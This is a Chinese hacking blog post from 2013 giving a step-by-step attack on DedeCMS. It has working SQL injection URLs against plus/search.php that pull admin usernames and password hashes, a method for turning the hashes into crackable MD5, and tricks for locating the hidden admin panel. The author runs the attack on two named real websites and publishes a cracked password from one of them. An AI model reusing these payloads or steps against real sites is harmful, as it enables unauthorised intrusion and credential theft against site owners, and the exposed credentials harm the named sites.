织梦cms注入漏洞 

阿城's Blog - 关注网络安全 黑客技术爱好者-阿城's Blog是一个关注网络安全,热爱黑客技术,分享各种技术教程资讯 —关注交流|web安全|漏洞发布|网络攻防|信息安全|网站建设



织梦cms注入漏洞

2013-12-16 10:31 作者:阿城 | cms漏洞库 |

   网上已经有几篇这样的文章了,当然我也是汇总了一些方法,并非原创。这个0day注入漏洞是1月份爆出来的,立马有人写出了利用方法。当然,渗透之路并非一番风顺,dede的安全防护做的也很好,所以成功与否仍然还是要看运气。

    测试的是这两个网站:http://www.bianminxueche.com/ 和 http://www.newflash.tv/ ,利用页面是plus/search.php。

步骤1:注入得到账号密码

    提交http://www.bianminxueche.com/plus/search.php?keyword=as&typeArr[ uNion ]=a 和 http://www.newflash.tv/plus/search.php?keyword=as&typeArr[ uNion ]=a 我们得到如下反馈:

    检测是否存在漏洞1

    检测是否存在漏洞2

    反馈为1时利用如下exp:

http://www.bianminxueche.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)

+from+`%[email protected]__admin`+limit+0,1),1,62)))a

+from+information_schema.tables+group+by+a)b

)%[email protected]`\'`+]=a

    获得如下页面可见到账号和加密过的密码(中间绿色的一行):

    漏洞利用1

    反馈为2时利用如下exp:

http://www.newflash.tv/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,

2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,

20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34

,35,36,37,38,39,40,41,42+from+`%[email protected]__admin`

%[email protected]`\'`+]=a

    获得如下页面中也爆出了账号密码:

    漏洞利用2

     如果反馈正常则说明漏洞不存在。

   

步骤2:破解密码

    dede的后台密码加密算法大家可以下了整站看,这里直说解法:将得到的20位密文去掉开头三位,去掉末尾一位,即为16位md5密码。

    如第一例中拿到的0038c7ad73902a9f1d87去首三末一为8c7ad73902a9f1d8破解出的密码是15858272308

步骤3:查找后台地址

    dede的后台目录可能改成任何名字,而且不需要插入数据库,也就是说通过注入漏洞是无法爆出后台地址的。不过网上有个简单的方法,访问 /data/mysql_error_trace.inc 里面或许能得到后台的相关信息。

    我试了,第一例失败,第二例成功如下:

    获得后台地址

    我们可以看到,这是一个记录数据库错误的文件,看到那个/ooxx/了吗,那个就是后台目录:http://www.newflash.tv/ooxx  

    如果这个方法失败,还可以通过google搜索的方法:构造site:bianminxueche.com intitle:后台 等关键字搜索,也许能得到后台地址。


文章作者:阿城
文章地址:http://www.ac166.cn/post-158.html
版权所有 © 转载时必须以链接形式注明作者和原始出处!

 

仅供学习与交流,遵循法律法规 & 如有侵犯您的版权请联系我删除 & 手机版

CopyRight © 2016 阿城's Blog - 关注网络安全 黑客技术爱好者.  All rights reserved.